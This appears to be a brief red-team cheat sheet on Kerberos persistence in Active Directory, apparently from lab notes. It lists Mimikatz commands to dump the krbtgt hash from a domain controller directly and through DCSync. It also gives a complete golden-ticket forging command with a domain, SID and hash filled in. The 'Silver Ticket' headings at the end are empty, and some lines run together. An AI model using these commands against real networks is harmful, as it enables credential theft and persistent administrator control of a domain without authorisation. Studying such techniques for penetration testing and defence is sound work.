Persistance
Kerberos
Golden Ticket
Execute mimikatz on DC as DA to get krbtgt hash
klist purge // to delete all tickets
Invoke-Mimikatz -Command '"lsadump::lsa /patch"' –Computername dcorp-dcTo use the DCSync feature for getting krbtgt hash execute the below
command with DA privileges:
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'On any machine to get a golden ticket
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"' Silver Ticket
Command Execution with Silver ticket
Last updated